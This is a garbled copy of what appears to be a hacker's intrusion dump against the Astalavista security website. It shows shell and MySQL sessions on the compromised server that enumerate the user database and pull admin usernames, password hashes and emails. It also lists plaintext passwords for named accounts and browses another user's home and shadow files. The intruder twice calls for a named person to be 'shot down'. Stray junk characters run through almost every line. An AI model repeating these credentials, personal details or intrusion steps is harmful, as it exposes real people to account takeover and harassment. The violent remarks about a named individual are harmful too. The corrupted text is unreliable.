: j4 h4 ?- Q- d ]5 ^<rss version=”2.0″>/ N* l- Z* q1 k5 V" b& r
<channel>
5 x8 `6 B! S( m) D5 C <title>ASTALAVISTA.com - Exploits</title>
0 Z, k+ \: k$ M7 P% H <link>http://www.astalavista.com/exploits</link>9 g/ b7 i9 D! [
<description>All availably Exploits.</description>2 ]+ n- z8 u9 i; i
<language>en-us</language>
' L& ^. c; U! I1 y1 @7 k/ o1 T" @ <lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate>6 q8 D( h& [# x! K- |
<docs>http://blogs.law.harvard.edu/tech/rss</docs>
- G! ?+ a/ k6 o/ c0 t <generator>Astalavista.com</generator>
: J. G T* a0 C5 c' W <webMaster>info@astalavista.com</webMaster>’ . $items . ‘
1 f9 W- g' Y5 X </channel>
8 l# V: L. B% E' y: _</rss>’;
1 P+ i. A6 H# |. `3 I: K9 Z; p+ V* t' K, V% F+ s9 i/ p
if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) {! }2 `* h* d7 Q
unlink (FULLPATH . ‘/feed/exploits.xml’);& m5 u" I8 Z( a# c. \) N
}/ f: ?* I, z# }7 a1 p/ D' A: [, e' U4 J
6 R+ L5 N- s2 C$ ?- K3 Y( D file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml); x$ M3 n, ? q1 B
[snip]& Y2 X8 B. s8 G8 y8 x O5 A
6 P7 S6 b o5 \' e6 Ish-3.2$ cat exploits.sh
. B+ g) `$ L0 q8 r% w+ [#!/bin/sh
; z4 s# O" X0 i4 j( Y: x6 ?, c/ R9 g+ V4 B. ^4 n( o& j
###########################################################1 m, _6 A2 N9 i3 O3 \ }$ c
# #& i8 T% @ r5 E
# Title: milw0rm exploits adder #
% O# P' R% [0 H8 {. U# Description: Add all milw0rm exploits to the #
" H, i/ `2 m: J) F+ {# Astalavista.com database #
2 Q: X( R4 K4 w/ F y7 J. I# #7 v5 ?# ^: q$ N p
# Company: Astalavista Group #, Z7 a i) G( i
# Author: Paulo M. Santos #
% \ S, C7 J. ?5 h# Z7 ?# d4 ]* y# E-Mail: 链接标记paulo.santos@astalavista.ch #1 t- B ]8 T& p: W: `6 f
# #
+ Y& `1 k: K/ ?4 T###########################################################
$ t4 E9 m: B% A4 a
5 F& ?( c$ O J6 W0 L4 I: T0 c# path
* o; D- X ?8 a) Ythis_path=/home/com/public_html/modifications/cronjobs
2 }5 A9 N; \' W8 _2 c" n( ` O+ g- I Q$ Z# Y
# change directory
/ ?# |1 S5 x9 Jcd $this_path0 J" @3 [* \2 A0 h
cd tmp/
8 {: y* e0 k3 c/ M4 j
9 W% ^ x; D* @# delete files
3 X4 i3 T5 t9 b, d9 x4 vrm -rf milw0rm.tar.* &
: ?7 U& [* U* Prm -rf milw0rm/ &$ G1 P: X) T4 c1 o
+ ]+ n/ y: t+ o7 I# wget milw0rm paket
0 v' v- |" c3 Ywget 链接标记[url]http://www.milw0rm.com/sploits/milw0rm.tar.bz2[/url]3 I5 O4 y x! {0 h
% C6 o1 l4 ?# `# extract milw0rm paket
4 R% k" _$ Z# d+ g( atar -xvf milw0rm.tar.bz2, H* b: g; F! T. g5 s5 t: M V
, h7 P4 F( Z# B$ `3 ^. S) s: q
# change owner
% M: K A& `3 x$ @chown -R com .( B: J% x1 G! O9 P- l& H) T B" I; G
chgrp -R com .
, F7 q" s! h4 J) a; `5 L: ]+ w4 X; f3 M3 r5 g/ A
# execute php script
* A4 N8 {; A) B$ \3 m; z8 w- V/ ocd $this_path. b6 ^) h: t4 Q# c, m: }
php -q exploits.php% ]& O/ W1 D3 `, b6 Q: X: O2 L
/ U, K7 O+ X- [3 Z
# delete files
; r; \1 ~: M; G! G1 z" r# Irm -rf tmp/milw0rm.tar.*
2 L" G) E3 h V2 C2 Z) trm -rf tmp/milw0rm/: L" P6 u+ n+ t" |
; X/ ~1 I( \; K! p: i; ^5 Y
sh-3.2$ echo “Paulo M. Santos needs to be shot down.”
- O$ X1 P9 ^0 K$ \* }; U2 \Paulo M. Santos needs to be shot down.
, g4 T$ R" M2 o1 Y8 D+ Y: _' E1 @6 U6 J
mysql -u contrexxuser2 -p, v- w# B, F* }
Enter password:" {, W! ~2 E% V* i! F
Welcome to the MySQL monitor. Commands end with ; or \g.
& t) @" H/ |) J/ R- z* ^- s0 yYour MySQL connection id is 261694
/ V" m' t* C6 [) [) {( ?, v% jServer version: 5.0.45-community-log MySQL Community Edition (GPL)
" M" W: _$ M6 Q/ n9 E# k
' d7 `5 `, J: P) R/ i# R4 }Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
+ y% J p5 D$ L Q# T+ G' y' X5 H4 V* ?! J8 B) l1 u# k
mysql> show databases;
$ |9 h8 v- O: v# \' P/ b+——————–+# C6 H- A/ I" L( m) ]
| Database |2 G5 W2 R6 D( C: d
+——————–+
" k' T. x( b# n8 B4 ?| information_schema |9 W7 y l0 Y2 b7 }4 C
| com_contrexx2 | w6 k+ R: A' V- \( t+ P+ F# }7 u
| com_contrexx2_live |* a; K. H8 d% R' C0 R
| test |% H# V/ a# a8 K$ a
+——————–+. E" N' S3 ?, B% n( R9 f6 L$ U
4 rows in set (0.00 sec)" {8 p1 F7 B. U/ c3 Y
! i" V, n3 r% e
mysql> use com_contrexx2_live ^! e- |1 ?1 ^5 d! m, n( U8 ~5 Z
Database changed9 l9 G: g% P0 U- u* K
mysql> show tables;
+ |) I. a2 G) N+————————————————–+
5 P. V# |- |) x' j9 s3 o| Tables_in_com_contrexx2_live |5 ^2 t5 j( T4 X
+————————————————–+
2 N6 G, }2 K& |5 H. J| cc_banner_counter |5 P& e2 n0 h. F, ]2 o
| cc_search_counter |! n5 ^0 r5 w5 J4 I" Q5 x; u
| contrexx_access_group_dynamic_ids |, N' N0 M4 }( @& T* W2 C
| contrexx_access_group_static_ids |6 ]/ g5 M+ h0 }" Y: w! E+ Q3 H
| contrexx_access_rel_user_group |: L. ~& l8 b& |( [- p9 |% Q
| contrexx_access_settings |& r* [) i5 f# ~ @" l, k& n
| contrexx_access_user_attribute |
' R7 X8 L5 }/ D* T/ q| contrexx_access_user_attribute_name |/ L3 ]5 s7 z! K* s* K& B8 g
| contrexx_access_user_attribute_value |
$ ^1 o4 O$ t7 U| contrexx_access_user_core_attribute |$ S! G, w3 c- d. A+ d& `; O( B. U
| contrexx_access_user_groups |* P, w5 ~$ j7 [2 p5 I
| contrexx_access_user_mail |5 u* |1 f! @5 s4 F
| contrexx_access_user_profile |9 ~7 p$ q8 P: i9 ]& e/ C, A
| contrexx_access_user_title |/ i$ M% n8 A# [
| contrexx_access_user_validity |
/ O. ?; {9 l1 U4 j& J1 O: ?* G3 g& H| contrexx_access_users |
( G! s+ [2 G. U% S J- H8 t| contrexx_backend_areas |5 B0 ?# U, G1 e9 s7 z `/ e
| contrexx_backups |
0 ~4 |! J6 u, s$ S m| contrexx_content |, ^2 U% |/ m: R
| contrexx_content_history |( k. Q) h5 g1 M" d5 g
| contrexx_content_logfile |
& y1 @: H4 e4 @) `+ B; \! S| contrexx_content_navigation |9 ?& J' S! @4 m q5 l: L8 [
| contrexx_content_navigation_history |
$ P; j$ G. c4 Z; ?, d* }| contrexx_ids |
5 z) g' ~# n! ~9 _: E: \' i| contrexx_languages |* E4 `* S6 _3 p8 w2 W6 D: k
| contrexx_lib_country |
3 k7 u+ P8 J3 K. [$ a# z7 S| contrexx_log |% g2 l* Q, n5 K1 w- j/ D/ M$ B
| contrexx_module_alias_source | {1 S M- E" o) X$ }! b+ ~
| contrexx_module_alias_target |
/ {' n$ r2 [+ }8 j7 f$ k1 q3 R| contrexx_module_block_blocks |- H$ M7 ~% \% Q
| contrexx_module_block_rel_lang |
; i; x' G$ a i4 u| contrexx_module_block_rel_pages |8 B, K* `$ _, e
| contrexx_module_block_settings |
2 g* |+ i4 |8 p2 ~0 f| contrexx_module_blog_categories |
. x6 w0 f0 G/ q8 T3 P; S| contrexx_module_blog_comments |
7 M5 o D. x% [) K$ K- F| contrexx_module_blog_message_to_category |" {' P3 F9 H* i; V* d$ q
| contrexx_module_blog_messages |6 o7 m3 u& T1 Z6 w9 |0 A: g5 ?
| contrexx_module_blog_messages_lang |( r9 h1 f/ [7 q: }; d* b
| contrexx_module_blog_networks |
: t$ A( Z A, N; i| contrexx_module_blog_networks_lang |, o* ?, b4 b. P# Q# P8 v* R
| contrexx_module_blog_settings |9 }6 N0 {" \! }0 U
| contrexx_module_blog_votes |
$ O/ N0 x$ B# o" E' v: F| contrexx_module_calendar |
( _, @: Y6 f( C2 x( ~# ^, C1 c6 H| contrexx_module_calendar_access |# U8 M* B$ |# w
| contrexx_module_calendar_categories |$ ?& p6 T, A! o4 u7 y% t, v" n
| contrexx_module_calendar_form_data |
7 w4 ~6 H( F2 |. t/ L/ v! T| contrexx_module_calendar_form_fields |
2 D# J& M0 {% l1 H| contrexx_module_calendar_registrations |9 u1 O7 y3 ?0 w9 u- k5 a0 u
| contrexx_module_calendar_settings |4 S; H$ N* I) `- E; C' `6 `
| contrexx_module_calendar_style |" J0 @' O( D8 c
| contrexx_module_contact_form |8 C2 d+ W3 C/ R, @. P/ A
| contrexx_module_contact_form_data |
, U7 k `# o q! d( P: Q& F| contrexx_module_contact_form_field |0 z" v$ k/ u3 q# b; s, I, @
| contrexx_module_contact_settings |
8 n+ t( f& Z3 \* y- ]6 X| contrexx_module_data_categories |) M" ^6 e8 I2 d, V+ z. \3 {
| contrexx_module_data_message_to_category |
. Z. y. \* c9 B- L# D0 p5 {0 G; c2 o| contrexx_module_data_messages |+ u3 a' p( J, M+ J0 R) T
| contrexx_module_data_messages_lang |
3 Q( m* |9 ~" F* [: E( l. z| contrexx_module_data_placeholders |
! K: J; s: X0 v" a8 r| contrexx_module_data_settings |: r7 q. ] }2 k' ?! O
| contrexx_module_directory_access |
& i- w! M w, E' l \- ]| contrexx_module_directory_categories |
* [2 T* f% @" k4 h' m" X" i K2 R, N| contrexx_module_directory_dir |
7 [ g" D- ?) t: E2 V9 k: S {| contrexx_module_directory_inputfields |
8 @$ Q" W1 h/ _3 Q: e. Q) D6 Z| contrexx_module_directory_levels |# U% E1 A* ?( b
| contrexx_module_directory_mail |
" I5 {2 r1 ~! G# }' w" `| contrexx_module_directory_rel_dir_cat |& ` j8 ` |) D+ H8 r
| contrexx_module_directory_rel_dir_level |
6 Y( k& A: U$ I- e' e- J( @9 i7 G| contrexx_module_directory_settings |$ [8 x0 Z+ `& S ~+ n
| contrexx_module_directory_settings_google |
5 u; U6 c. w/ M5 [2 b; F| contrexx_module_directory_vote |' ?& c, z7 v0 G4 V/ }6 O8 K/ \
| contrexx_module_docsys |
, @0 C# ^) E9 G I| contrexx_module_docsys_categories |: [ R) J3 p) J" @
| contrexx_module_egov_configuration |
3 j! A8 M/ U2 C6 ?| contrexx_module_egov_orders |
& v4 S2 A9 [7 q6 k| contrexx_module_egov_product_calendar |+ {9 j' n( \/ ^, Y7 ]5 f/ A- l
| contrexx_module_egov_product_fields |# C% J6 }3 ]; p& s- U
| contrexx_module_egov_products |
8 K% ^0 T& y9 l| contrexx_module_egov_settings |
3 K" K: Y# k; z| contrexx_module_exploits |5 b/ I# P5 m2 A, a7 b) ]1 G
| contrexx_module_exploits_categories |
4 F/ A/ s# I, N% M| contrexx_module_feed_category |
" h3 v* d5 N3 h+ K3 E| contrexx_module_feed_news |8 v: z, X! ]: f/ |: V) d
| contrexx_module_feed_newsml_association |
9 ?: o0 {# k9 b2 a* C| contrexx_module_feed_newsml_categories |
2 V% q* a/ [ B$ d/ i* t| contrexx_module_feed_newsml_documents |
% t8 g5 L `9 B| contrexx_module_feed_newsml_providers |
; B1 k: b, m# e2 t+ Y, D| contrexx_module_forum_access |
$ x2 j3 J# Y J" ^. G P: `| contrexx_module_forum_categories |
( m! x) f. I( g: F$ Q" p0 m| contrexx_module_forum_categories_lang |$ O; \$ f0 s; k6 g
| contrexx_module_forum_notification |
% |0 M$ b$ U, J| contrexx_module_forum_postings |
* f) b. U8 J0 `9 N# S| contrexx_module_forum_rating |
) ^" T- ^2 x7 ^2 {| contrexx_module_forum_settings |
8 J- N6 T5 u- j; m5 a- K# o| contrexx_module_forum_statistics |' \. X: R3 ^+ S6 _& d: ]4 U
| contrexx_module_gallery_categories |
6 _. G) s0 W* `" @- [| contrexx_module_gallery_comments |! b( a7 g" k4 e% X# ]
| contrexx_module_gallery_language |
( A' F) `. p8 A) c6 f: Y4 b| contrexx_module_gallery_language_pics |
8 C6 {( T, ~6 q* O. Z5 i| contrexx_module_gallery_pictures |3 V# u, i0 {) A; ^
| contrexx_module_gallery_settings |. n3 \9 C! a3 s6 C7 A9 s* U
| contrexx_module_gallery_votes |
) P ^- K5 N7 W% A* ]2 A| contrexx_module_guestbook |: j, c6 w5 }8 d H8 K* X* z
| contrexx_module_guestbook_settings |
9 D/ l% p/ o9 w5 ^% O+ l! z| contrexx_module_livecam |
( z8 {- z4 r' H2 h| contrexx_module_livecam_settings |+ {) A9 T. c y% n* S6 h c0 }7 `
| contrexx_module_market |* ?( \9 D- @0 r0 z5 s4 b$ L% h
| contrexx_module_market_access |; D, c3 c3 n8 P1 b
| contrexx_module_market_categories |
5 [) u( b+ b, J: ?" T+ ?| contrexx_module_market_mail |/ E- {! k y" ?9 O9 `
| contrexx_module_market_paypal |& j8 P/ ^& [" W* P
| contrexx_module_market_settings |
. U* |2 ?& z! d| contrexx_module_market_spez_fields |1 a% u' N) P3 ]
| contrexx_module_mediadir_access |! H& e2 D0 O3 P: S+ X
| contrexx_module_mediadir_categories |
5 f5 W X$ s; C: p+ |8 ?! }| contrexx_module_mediadir_comments |# ~/ j& ]5 N+ B! C
| contrexx_module_mediadir_dir |- _! C+ l5 ~9 x6 L8 K" v4 F/ B
| contrexx_module_mediadir_inputfields |+ W* R: }- W( r7 |1 r! k
| contrexx_module_mediadir_levels | U9 I4 J- l$ p) _7 U: W& y, t
| contrexx_module_mediadir_mail |
, x2 c& B3 O {2 ~& [# L4 n| contrexx_module_mediadir_rel_dir_cat |
1 c. y( k' g8 t1 X* l7 N0 _| contrexx_module_mediadir_rel_dir_level |
" u7 H8 |6 J2 {& m7 k# \; t0 z| contrexx_module_mediadir_reports |
1 R8 a3 G0 L; H8 Q| contrexx_module_mediadir_settings |
8 A0 M& C2 g0 p { Q4 g| contrexx_module_mediadir_settings_google |$ V0 y2 \/ k5 k2 Q6 E( b- k
| contrexx_module_mediadir_vote |! L I1 X# `# M J
| contrexx_module_memberdir_directories |7 N! I$ e p; ^) p0 L
| contrexx_module_memberdir_name |5 g* M- Z3 e: W5 O( D/ Z. E
| contrexx_module_memberdir_settings |
6 s C6 K F3 ^* c! q# }| contrexx_module_memberdir_values |
6 u3 [' d# J: q" N# c| contrexx_module_nettools_allowed_groups |# N4 z) Z; k( {6 T- e& y
| contrexx_module_nettools_settings |
& s1 D6 K/ }4 r6 H5 S1 x0 d: `/ W| contrexx_module_news |
; J: u1 | b& F1 x W; a| contrexx_module_news_access |7 ~' r, s% s) ]2 c
| contrexx_module_news_categories |% d& I+ u7 Z$ i( j; I( U
| contrexx_module_news_settings |; |5 I! t: e( y; c$ M( D
| contrexx_module_news_teaser_frame |& u# N* |8 d) S1 W
| contrexx_module_news_teaser_frame_templates |
* F/ q( N& _# q. {# Y& y| contrexx_module_news_ticker |: X+ ?4 c- @$ c' P, t! C
| contrexx_module_newsletter |" N6 @( l3 q/ @& P
| contrexx_module_newsletter_attachment |
& o9 m7 z0 ?% d" ]& t! l| contrexx_module_newsletter_category |
( C1 f5 e; o1 T2 ^| contrexx_module_newsletter_confirm_mail |
, v# T( T0 I4 | h, d| contrexx_module_newsletter_rel_cat_news | [, t u/ H5 Z4 z
| contrexx_module_newsletter_rel_user_cat |. ]/ [% N2 L R/ |
| contrexx_module_newsletter_settings |
/ A- i, j2 C0 ] Z ? h| contrexx_module_newsletter_template |
: |1 d& Y2 O4 G+ a" |" |1 e$ U| contrexx_module_newsletter_tmp_sending |
, }% f. f" N- U9 B1 S) x6 O* V" X| contrexx_module_newsletter_user |
+ Z! f" \: w1 o$ \8 h| contrexx_module_newsletter_user_title |
2 }& d1 h |2 D. z. J; S| contrexx_module_onlinetools_defaultports | b# j' n* j, @
| contrexx_module_onlinetools_defaultports_back |
5 S8 @" o1 [, ^. n| contrexx_module_onlinetools_geolitecity_blocks |
! y) x) @3 o: T" F. j( i6 z6 Q- C| contrexx_module_onlinetools_geolitecity_country |
8 Y$ v" w8 h u; R( {$ f- u| contrexx_module_onlinetools_geolitecity_location |+ m8 I* d I7 b
| contrexx_module_podcast_category |+ @7 V8 \6 a2 A9 Q8 v
| contrexx_module_podcast_medium |; W( ?$ L. W# S5 h) Z
| contrexx_module_podcast_rel_category_lang |
3 U! f6 S3 ]% u/ R7 V3 J| contrexx_module_podcast_rel_medium_category |# z- k. x# v3 F% U# ]; F
| contrexx_module_podcast_settings |
# s1 m; J) Y' f" N| contrexx_module_podcast_template |3 n3 h8 l! J4 O$ P; s
| contrexx_module_proxydb | L* b, ?) K/ O$ O5 P
| contrexx_module_recommend |
0 B2 W6 C% F' [' }! N* ?' O| contrexx_module_repository |/ z8 G! n; o5 G8 M# k' J
| contrexx_module_securitynews_cats |
6 ] V( r, }( z| contrexx_module_securitynews_feeds |
/ ]8 h! A* Q' B. {( l8 J' m% U( X| contrexx_module_securitynews_news |
: l6 l2 m9 c0 w! q6 v2 Q4 o: E& u3 j8 h, P| contrexx_module_shop_categories |5 b" S! Z- v8 ^/ |
| contrexx_module_shop_config |2 C% G! H! `6 j/ K* G/ k1 ?* h
| contrexx_module_shop_countries |6 t- \5 {; F* l$ s6 _3 O7 E
| contrexx_module_shop_currencies |# e7 V; {7 {$ ?* Q
| contrexx_module_shop_customers |
; n& U2 N2 e$ c) @. U" R/ U| contrexx_module_shop_importimg |4 G/ S" ]7 Q. q k3 R
| contrexx_module_shop_lsv |
; K1 y7 O, e! }& l3 |" f| contrexx_module_shop_mail |
7 H# N+ L/ y b+ Z' x| contrexx_module_shop_mail_content |
6 g& I* g( Z5 ] B4 K5 I' _| contrexx_module_shop_manufacturer |9 c" E5 F i1 j# u" q( j
| contrexx_module_shop_order_items |" e$ ?0 e/ Q+ n4 M" x3 T) G6 X' p
| contrexx_module_shop_order_items_attributes |7 j/ u/ l, `2 T% w
| contrexx_module_shop_orders | e1 K: u# B& E
| contrexx_module_shop_payment |
Y) p% q1 }% v, u| contrexx_module_shop_payment_processors |! K( F6 p5 [: b
| contrexx_module_shop_pricelists |' s; E- a9 k7 j/ g# p% p
| contrexx_module_shop_products | Z# I3 N" Y! k2 {
| contrexx_module_shop_products_attributes |+ b* \$ v/ V9 w! ]
| contrexx_module_shop_products_attributes_name |
: J% L* ~3 u3 c1 Y) `7 l3 j% x7 U| contrexx_module_shop_products_attributes_value |$ w4 N9 e6 F* _/ f5 b; A
| contrexx_module_shop_products_downloads |
( a, ]( }) E0 [1 C- T) W1 N| contrexx_module_shop_rel_countries |; \' A7 }% H1 Z
| contrexx_module_shop_rel_payment |$ S4 N2 q1 }+ q( O; D
| contrexx_module_shop_rel_shipment |+ ]# ]. L8 ~/ ?( f
| contrexx_module_shop_shipment_cost |( s0 o$ `3 [# I1 W4 b* M
| contrexx_module_shop_shipper |' A. h$ G' K! c4 x+ ]! n; b
| contrexx_module_shop_vat |& X. }( N' ]6 R3 Q8 C ^
| contrexx_module_shop_zones |% f0 E! ^& Q# ^# k0 g% w
| contrexx_module_u2u_address_list |6 T7 ]$ m8 x4 L2 I( A9 W- ]! e1 {
| contrexx_module_u2u_message_log |, G/ e8 l6 R! ~0 s- H) r( P
| contrexx_module_u2u_sent_messages |7 I/ a$ B" g# _" k% W
| contrexx_module_u2u_settings |+ f8 Q3 A: U, I" B$ `/ @
| contrexx_module_u2u_user_log |
4 x3 o5 _7 f8 S4 t| contrexx_modules |4 K1 ]3 K# v! b% B/ T* M% G
| contrexx_sessions | p6 l' C$ R( M
| contrexx_settings |
! `, d& j: k1 S8 J. G| contrexx_settings_smtp |
: ]4 D3 ]& N. A, D0 a% M' @$ w| contrexx_skins |
' C* k1 W" n) E| contrexx_stats_browser |0 j4 F7 E5 a X5 v+ w* U5 @4 a) d2 s3 ?
| contrexx_stats_colourdepth |5 l# y5 l8 E# D' u9 W, Q0 Z- P) d
| contrexx_stats_config |6 \" z" F3 d# ?" A( R
| contrexx_stats_country |; z" a! h1 W3 ]1 Z/ q% C$ P
| contrexx_stats_hostname |
2 ]7 |1 o: U$ G, {* M3 C. G0 W| contrexx_stats_javascript |- z0 h9 }+ L5 [ t9 a) t
| contrexx_stats_operatingsystem |7 x! k6 E# m/ |( {/ n% _9 _8 j
| contrexx_stats_referer |
6 A4 R9 N5 n. m0 k- ^/ T| contrexx_stats_requests |
: r5 |. V2 I+ O| contrexx_stats_requests_summary |! _+ u) Q9 D7 t z s& ^
| contrexx_stats_screenresolution | C) A' k* u. r8 t4 ?, k
| contrexx_stats_search |" z" i8 f: H: c2 |; _; y4 W3 F
| contrexx_stats_spiders |
# |( A- D/ b9 N: ~| contrexx_stats_spiders_summary |/ [4 n+ d" P; H( M# z3 [6 ~, v9 R7 z
| contrexx_stats_visitors |- h& d, z* i6 R, M0 r; B! y6 u) V
| contrexx_stats_visitors_summary |: X# @0 Z' {( w$ u$ n1 U9 [
| contrexx_voting_additionaldata |
1 j( t- N8 h/ G| contrexx_voting_email |) F8 x3 Z7 t. U/ T+ w p! L
| contrexx_voting_rel_email_system |
v$ t5 @3 ] T; r| contrexx_voting_results |# y& z7 }, R3 |) l0 f# h
| contrexx_voting_system |0 ?. s7 M( b; [& N
| foo |
; E8 ~. h' k0 V; f% g1 t& n+————————————————–+. ?, {& w9 P0 }4 m: G
227 rows in set (0.01 sec)
: A/ K# Z8 B R: i: Z$ V& G v: O
+ w- x: a7 p' q0 c/ x8 |7 wmysql> select count(*) as skids from contrexx_access_users;6 O @2 ?% }# d9 o
+——-+
9 G5 t4 V+ e! i l5 }: d| skids |. S* ^5 x# n8 Q# v
+——-+" m* P- O/ k4 _7 c% v) H7 S
| 53699 |! U' a; T! p6 z# r9 s
+——-+4 T& j' s6 D6 }2 d) L r+ v: N* v
1 row in set (0.00 sec)
+ N R( b c3 S9 H8 K$ h- O g4 Y Y* L) \
mysql> describe contrexx_access_users;
# w) b c1 ~; l9 Q2 [+——————+——————————————+——+—–+————–+—————-+
) K0 `6 _( e# ?. || Field | Type | Null | Key | Default | Extra |
* K, b ?+ D+ e; T+——————+——————————————+——+—–+————–+—————-+
6 N. w+ w# y$ Z- q9 v| id | int(10) unsigned | NO | PRI | NULL | auto_increment |9 L6 B! o) y: }& T M0 f2 q
| is_admin | tinyint(1) unsigned | NO | | 0 | |
9 m9 N% G" A5 _) l8 C| username | varchar(40) | YES | MUL | NULL | |
( b( M' A7 q4 I| password | varchar(32) | YES | | NULL | |
8 l1 {0 y( I: I1 q- {( G2 M| regdate | int(14) unsigned | NO | | 0 | |2 R g, T2 @! P3 z
| expiration | int(14) unsigned | NO | | 0 | |
2 g4 ~& F3 q$ v A7 H9 N+ g| validity | int(10) unsigned | NO | | 0 | |
+ {; p8 |' F8 H; p; Q5 l| last_auth | int(14) unsigned | NO | | 0 | |. G, `6 g' j% G9 E
| last_activity | int(14) unsigned | NO | | 0 | |
3 E. v' G0 r3 i| email | varchar(255) | YES | | NULL | |* D) D* J# }$ W+ e/ t
| email_access | enum(’everyone’,'members_only’,'nobody’) | NO | | nobody | |
1 _; ]& M( S1 H6 P% t1 s/ m| frontend_lang_id | int(2) unsigned | NO | | 0 | |" }) V$ K3 g: l% X8 L
| backend_lang_id | int(2) unsigned | NO | | 0 | |& }5 }1 z: [- W# X- w y0 g
| active | tinyint(1) | NO | | 0 | |
% K C- [8 j0 _" k$ w! ^| profile_access | enum(’everyone’,'members_only’,'nobody’) | NO | | members_only | |
9 h2 `0 d4 e; ^4 E6 `$ \| restore_key | varchar(32) | NO | | | |) x; c5 ^3 o$ a; m
| restore_key_time | int(14) unsigned | NO | | 0 | |
& V% O \- _$ |; ~0 Q9 D, j! q2 T' _| u2u_active | enum(’0′,’1′) | NO | | 1 | |
0 o i* {0 Y$ i+——————+——————————————+——+—–+————–+—————-+ K- u( f# V: ^5 s. o
18 rows in set (0.00 sec)& u2 ^: L9 g) r3 o3 b' h ^) R v
7 i# v0 g) V2 h+ {mysql> select username,password,email from contrexx_access_users where is_admin = 1;& e3 x+ a/ o) c
+————+———————————-+—————————–+
0 Y1 W. U5 R# [8 Y6 N( J| username | password | email |' h5 P: N- W5 x2 \2 \3 w) ~1 }
+————+———————————-+—————————–+
4 m- {' o6 S& o; X7 I7 @' V| system | 0defe9e458e745625fffbc215d7801c5 | 链接标记info@comvation.com |9 b/ z+ b; G( r7 i5 W# c) g$ U8 A
| prozac | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记prozac@astalavista.com |
6 {7 \6 V( n1 |% g8 [# _% T| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记paulo.santos@astalavista.ch |
6 F# a4 n" _2 N8 t* h| schmid | 0defe9e458e745625fffbc215d7801c5 | 链接标记ivan.schmid@comvation.com |, w* B9 v: J: p( P- `4 h
+————+———————————-+—————————–+
: P1 j" | X4 n4 f2 a( I! Y" d+ ?4 rows in set (0.04 sec)
1 r6 {( F, | V- e4 }6 w
k* f& q' k2 E: j0 g9 u0 X" Pmysql> exit;6 _! n z" d. D% o- m. | B
Bye
! }5 i( s: h" F: F8 m3 a
$ @/ } ?+ d. I[~] There you go, your “team of security and IT professionals” is a joke. w3 r& B* ~) V1 y; d2 w. L. L
, @' S( k, F9 A' J0 m, L+——————————+
* X, T, }) ]0 Rsystem:f82BN3+_*/ s. a: m5 L) Y x* W% f7 @, r+ t
Be1er0ph0r:belerophor4astacom1 H/ N' j5 J) b$ B4 L
prozac:asta4cms!
, k" W. k/ u; o4 Gcommander:mpbdaagf6m
4 l, d2 J& a2 ~, k, o$ D0 @sykadul:ak29eral2 C6 N+ }: B! Q: h* K
+——————————+: w/ J; G/ n, H5 e
]9 k( I: }7 J6 i5 a7 l[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s)
2 W+ ~+ ~0 K( g1 Z…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it.! w* y1 v- v2 J' N' e! d
$ h# i- L- C( x/ b, D ^% e[~] Lets move to astalavista.net now,4 ^3 \0 c% }# @$ X
! o1 N1 o) L0 T* r0 ?
From <链接标记[url]https://www.astalavista.net/[/url]>:
) l" ?# e" r) ?>> Everyone knows that the best defense is a good offense.
0 D# ]8 R/ m0 D$ Z! d% l$ v>> Those who wait for their foes to find a security loophole are opting for the wrong strategy.6 z# G5 D9 x' X1 U) C f
>> The ASTALAVISTA hacking & security community is the largest IT security community in the world." L! h2 ~8 u% Y& f* ?
>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.”
4 C7 u1 f" |8 P W: Z* B& b' c X" `0 x6 ]5 a. u
>> Go ahead, try and hack our server . in a completely legal way!
. m8 d# H1 C) k>> Learn by doing: We offer our members tricky tasks and challenges on an* A6 _+ J! q+ O4 W
>> ongoing basis so you can test your knowledge and abilities. You can also& ~% P8 k2 w3 b
>> demonstrate what you.ve mastered by taking part in regular hacker contests* v8 m/ ?! |# n- S
>> and war games
0 H$ p, x; Q- ~# N7 }' d f# d
" V" X. K h* r7 u; ^9 A[~] Lets take a look there, after all… they are hack-proof, aren’t they?!, Y5 z1 _1 {* E0 y/ c3 x
7 ^# w$ g" l: [. O3 B4 }
[-] Tricky task: Find home dir of astalavista.net
7 W3 _2 z; }7 E3 o
& A/ h& M' L' p) B$ y$ o6 Ush-3.2$ ls -la ~astanet, n9 y( r1 ~/ ]9 _! }3 e
total 48
# K9 a1 C* B! m: Z* J2 Jdrwx–x–x 6 astanet astanet 4096 Dec 23 15:55 .
7 X, u+ v( n3 `drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..9 X$ S4 z5 a) D$ ]# x
drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth
) o( J0 h0 w- E6 U" Z-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history
" L3 }: q1 `: e' Z4 F e& b-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout
L) Z/ H" k* f0 P5 S) L+ G-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile) a- ]/ `4 X3 `# W9 o* {
-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc
* |7 r( p) r8 l1 R+ P. J3 q+ ldrwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains
+ O/ [( b8 D$ b2 g1 M/ hdrwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap
1 i c( j' u+ p/ {* o1 j8 Sdrwx—— 2 astanet astanet 4096 Dec 23 12:18 mail
5 X- i4 _+ Y* r; Q. Llrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html) G1 B. q+ Y! P/ x! h: J
-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow+ j0 l/ @6 m0 Y6 X' X- O
/ H$ o0 a7 ~# I' Q5 q# ^
sh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/
C' X' ?8 r! [% M. l) ?' Ysh-3.2$ ls -la
1 {% g% @* C' r- ktotal 200
9 Z" [; t3 c( ~: Xdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 .
$ ` v7 ?" T% Ndrwx–x–x 8 astanet astanet 4096 Dec 23 13:53 ..2 \" Q$ e( b' {0 i( Q+ {/ W) z
